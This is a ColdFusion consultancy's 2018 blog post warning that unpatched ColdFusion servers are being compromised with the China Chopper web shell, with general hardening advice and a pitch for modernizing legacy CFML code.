TeraTech

The ColdFusion Experts: Develop | Secure | Optimize

  • Services
  • About
  • CF Alive
  • Blog
  • Podcast
  • Contact

  • Services
  • About
  • CF Alive
  • Blog
  • Podcast
  • Contact

No-Nonsense November: Ongoing Security Alert for Legacy Coders

November 15, 2018 By Michaela Light Leave a Comment

Contents

  • What is the China Chopper?
  • Effects of the China Chopper
  • Preventing the China Chopper Attack on your Systems
  • Converting Legacy Code to Modern, Vibrant CFML
    • Join the CF Alive revolution

I told you so.

That’s probably the worst thing someone can say to you. Especially when it comes to security.


Many times over, I have preached the importance of staying up to date with the latest security patches and upgrades. This is for one big reason. The bad guys are always one step ahead.

As much as we hate to admit it, it’s true. If they weren’t, every hacker, criminal, or just “generally bad dude” would be out of a job. Yet, we are constantly having to protect ourselves from them. That’s because they stay one step ahead.

But by keeping your ColdFusion modern, and up to date, we drastically minimize our security risks. Because let’s face it, no system is ever 100% secure.

At this exact moment, there is a wave of ongoing security vulnerabilities being exploited. You see, a group of hackers has reverse engineered a Security update patch in order to wreak havoc on unpatched users. The APT (Advanced Persistent Threat) group is targeting unpatched users and are installing the China Chopper Trojan allowing for a backdoor into users systems for a total access takeover.

All systems not patched with the September 11, 2018 security update are at risk!

What is the China Chopper?

The China Chopper belongs to a group of threats known as web shells. These web shells are scripts that can be uploaded to allow for remote access of a system. Once uploaded, they can be used to administer permissions and execute commands.

The China Chopper variant was first discovered in 2012. Since then, it has been used the world over to access vulnerable servers. These servers specifically include those written in:

  • JSP
  • ASP
  • ASPX
  • PHP
  • And that’s right… CFML

The China Chopper is not just limited to Windows either. It has been found running on Linux-based systems as well.

There are many ways that this trojan can access your files. Barring a direct server upload, the following ways are normally prevented via updated security:

  • XSS (Cross Site Scripting)
  • SQL Injection
  • Exposed Admin Interfaces
  • RFI (Remote File Include) Vulnerabilities
  • LFI (Local File Include) Vulnerabilities
  • File Processing Vulnerabilities
  • Vulnerabilities in Apps and Services

The last on the list appears to be the root cause of this current security breach.

Effects of the China Chopper

According to US-CERT (United States Computer Emergency Readiness Team), there are four main reasons attackers would infect your system with the China Chopper.

  1. To harvest and exfiltrate sensitive data and credentials;
  2. To upload additional malware for the potential of creating, for example, a watering hole for infection and scanning of further victims;
  3. To use as a relay point to issue commands to hosts inside the network without direct Internet access;
  4. To use as command-and-control infrastructure, potentially in the form of a bot in a botnet or in support of compromises to additional external networks. This could occur if the adversary intends to maintain long-term persistence.

In short, if your system is infected with the China Chopper (or any other web shell for that matter)… you’re gonna have a bad time.

So, how are you going to stop this from happening?

Preventing the China Chopper Attack on your Systems

It may seem like I’ve overstated this point but… employing regular updates as they are released is the number one way to prevent this issue. The best way to ensure that you are doing this is to take advantage of the automatic update system Adobe has in place. This way you are sure never to miss an update, and you stay your most secure with maximum protection.

Some of you may say… Oh, those updates are so annoying. They just eat up my server’s time… Well so does having to regain control of them after being infiltrated by an easily preventable cause. But sheesh! Aren’t those security updates annoying?

I hope you can detect the sarcasm.

Besides that though, there are a number of best practices you can take to help further secure your systems.

  • Create and implement a least-privileges policy for your servers.
    • This reduces the capability of those with malicious intent and limits file and execution capabilities of certain directories.
  • Create a Demilitarized Zone (DMZ) between your web apps and your servers.
    • By limiting traffic and logging interactions, you can identify potential threats much easier.
  • Verify you have established a secure config of all of your web servers.
    • Triple check your permissions and block or disable all unnecessary ports and plugins.
  • Perform regularly scheduled security scans and follow proper lockdown procedures.
    • This will help you to identify problem areas that you can further secure before anything terrible happens. This best practice is made much easier through the use of CF 2018’s Auto Lockdown feature.

These are just a few best practices you can utilize to help further protect your systems and servers.

For more on best practices, check out our podcast with Nolan Erck, “047 Best Practices Are Best, Except When They’re Not”

Converting Legacy Code to Modern, Vibrant CFML

Along with updating your security, updating your code is just as important. There may be many reasons why you are still working with outdated CFML.

CFML is dying… Why should I waste my time with it?

False. CFML is more alive than ever! Adobe released its latest version CF 2018 this year. And after speaking with Tridib Roy Chowdhury, numbers have never been better for Adobe. For all you Lucee users out there, great news for you! Swansea Jack aka Lucee 6 was just announced at this year’s CFCamp in Munich! Plus with all the young, fresh faces representing the CF community… it looks like CFML is here to stay. So your “CFML is dying” excuse… yeah right.

It’s so hard to convert legacy code to modern code. Better to use my old code until obsolete.

False. Yeah, just like it’s still better to use those @aol.com accounts and stay on Windows 95. You may laugh, but there are still some out there doing this. It’s becoming easier and easier by the day to convert your legacy code.

In another podcast with Nolan Erck–059 Migrating legacy CFML to MVC (Model View Controller),

he discusses just how easy it is to migrate to MVC. Brad Wood just gave a presentation on Day 2 of the CFCamp on migrating CFML to MVC via the heavy hitting, yet simple to use ColdBox MVC Module.

Related: “Easily Moving from Legacy Code Hell to Modern CFML Heaven”

There are plenty of resources available to help you make a change for the better. So… not gonna buy that excuse either.

The old system and code are working just fine… I don’t need any stinking upgrade.

False. I mean burying your excrement in the backyard worked fine too… But thank goodness for flush toilets! There are so many benefits to upgrading your legacy code. Here are just a few:

  • Easier Maintenance
  • Faster Deployments
  • Fewer Bugs
  • More Modern and Responsive Front End

But hey, if you like spending long hours and resources on unnecessary bug repairs… be my guest.

In a nutshell, I can’t tell you how to live your life. But I can give you suggestions on how to make it better… for your CFML experiences particularly. This attack was completely avoidable, and yet still any users were affected. Heck, newly infected systems grow in number each day. This does not say anything about the state of security for ColdFusion and CFML though. By keeping up-to-date with your security protocols and enlisting the help of third-party tools, you can keep your servers just as secure as any other.

Related:  Podcast with Pete Freitag–020 Secrets of High-Security ColdFusion Code.

Join the CF Alive revolution

Discover how we can all make CF more alive, modern and secure this year. Join other ColdFusion developers and managers in the CF Alive Inner Circle today.

  • Get early access to the CF Alive book and videos
  • Be part of a new movement for improving CF's perception in the world.
  • Contribute to the CF Alive revolution
  • Connect with other CF developers and managers
  • There is no cost to membership.

Related Posts

  • Cameron Childress to lead Fusebox documentation projectCameron Childress to lead Fusebox documentation project
  • 094 Adobe ColdFusion Specialist Certification (new at CF Summit), with Elishia Dvorak094 Adobe ColdFusion Specialist Certification (new at CF Summit), with Elishia Dvorak
  • State of the CF Union survey – partial resultsState of the CF Union survey – partial results
  • 085 ColdFusion and Angular (Modern Development Strategies) with Nolan Erck – Transcript085 ColdFusion and Angular (Modern Development Strategies) with Nolan Erck – Transcript
  • Best wishes for the new FuseboxBest wishes for the new Fusebox
  • Modernization of Adobe ColdFusion (More Secure Than Ever)Modernization of Adobe ColdFusion (More Secure Than Ever)
  • Facebook
  • Twitter
  • LinkedIn

Filed Under: CFML, China Chopper, ColdFusion 2018, Legacy Code, Modernize ColdFusion, Productivity, Security Tagged With: China Chopper, Security alert

← Previous Post State-of-the-Art Tools That Keep ColdFusion Alive
Next Post → CF India Summit: Part One – Workflow and Document Management Made Easy w/ ColdFusion

CF Alive Best Practices Checklist

 

Modern ColdFusion development best practices that reduce stress, inefficiency, project lifecycle costs while simultaneously increasing project velocity and innovation.

Recent Posts

  • 4 Reasons Why Your ColdFusion Web Apps Are Suffering (And How To Avoid It)
  • Google Down – An Unprecedented Event (Save Your Data Fast!)
  • 107 ColdFusion 2021 Revealing Details on How it was Created with Rakshith Naresh
  • Into The Box LatAm 2020 Virtual Conference – Free to Register!
  • Slow ColdFusion Applications May Ruin Your Business (3 Steps to Prevent It)

Categories

  • ActionScript
  • Adobe CF Summit
  • Adobe CF Summit East
  • Adobe CF Summit East 2018
  • Adobe ColdFusion 11
  • Adobe ColdFusion 2020 Beta
  • Adobe ColdFusion 2021
  • Adobe ColdFusion Project Stratus
  • Adobe ColdFusion Security
  • AIR
  • Ajax
  • AngularJS
  • Announcement
  • API
  • Apollo
  • Auto Security Lockdown
  • AWS
  • C#
  • Certification
  • CF Alive
  • CF Alive Book
  • CF Alive Podcast
  • CF Camp
  • CF Developer week
  • CF Maintenance
  • CF Summit India
  • CF Tags
  • CF Training
  • CF Vs. Other Languages
  • CFEclipse
  • CFML
  • CFML Open- Source
  • CFObjective
  • cfquery
  • CFSummit
  • CFUnited
  • China Chopper
  • CIO
  • Classes
  • Client Highlights
  • ColdBox
  • ColdFusion
  • ColdFusion 2018
  • ColdFusion 2020
  • ColdFusion 2021
  • ColdFusion 9
  • ColdFusion community
  • ColdFusion Conference
  • ColdFusion Consulting
  • ColdFusion Developer
  • ColdFusion Development
  • ColdFusion Hosting
  • ColdFusion Security
  • ColdFusion Webinar
  • CommandBox
  • Conference
  • Cool Stuff
  • Culture
  • Cybercrime
  • Database
  • Development Approach
  • DevOps
  • Docker
  • Fixinator
  • Flex
  • Frameworks
  • Fusebox
  • FusionReactor
  • Futurology
  • Garbage Collector
  • Google Down
  • Into The Box Latam
  • IntoTheBox Conference
  • Java
  • JavaScript
  • JVM
  • Learn ColdFusion
  • Legacy Code
  • Load Testing
  • Lucee
  • Management
  • MAX
  • MDCFUG Lunch
  • Microsoft Azure
  • Mindmapping
  • MockBox
  • Modernize ColdFusion
  • Monitoring
  • Muracon
  • NCDevCon
  • New Intern
  • News
  • Node.js
  • Open- Source
  • ORM
  • Ortus Developer Week
  • Ortus Roadshow
  • Performance
  • Performance Tuning
  • PHP
  • Productivity
  • Programming Languages
  • Project planning
  • Query of Queries
  • Roadmap
  • Scalability
  • Security
  • Server Software
  • Server Tuning
  • Social Media
  • Spiral Web
  • SQL
  • Success Story
  • Survey
  • Technology
  • TestBox
  • Tips
  • Transcript
  • Trapeze Development
  • Uncategorized
  • Web 2.0
  • Web Application
  • Web Server
  • Webinar
  • Webmail
  • What is ColdFusion?
  • Whole Brain Development
  • Women in Tech
  • Work From Home

Recent Comments

  • Michaela Light on A Comprehensive Guide to Running a Successful CFML Project
  • Michaela Light on Is Lucee CFML now better than Adobe ColdFusion?
  • Michaela Light on Introducing Swansea Jack (Lucee CFML 6 announced)
  • Michaela Light on 082 ColdFusion and the Blockchain Revolution with Mike Brunt
  • Michaela Light on 082 ColdFusion and the Blockchain Revolution with Mike Brunt
  • Home
  • Services
  • About Us
  • CF Alive
    • CF Alive Book
    • CF Alive Inner Circle
    • CF Alive full resources cheatsheet
  • Blog
  • Podcast
    • Podcast Guest schedule
  • Contact
  • Sitemap

The ColdFusion Experts:
Develop, Secure, Optimize

TeraTech Inc
451 Hungerford Drive Suite 119
Rockville, MD 20850

Tel : +1 (301) 424 3903
Fax: +1 (301) 762 8185

Follow us on Facebook Follow us on LinkedIn Follow us on Twitter Follow us on Pinterest Follow us on YouTube

Copyright © 1998–2021 TeraTech Inc. All rights Reserved.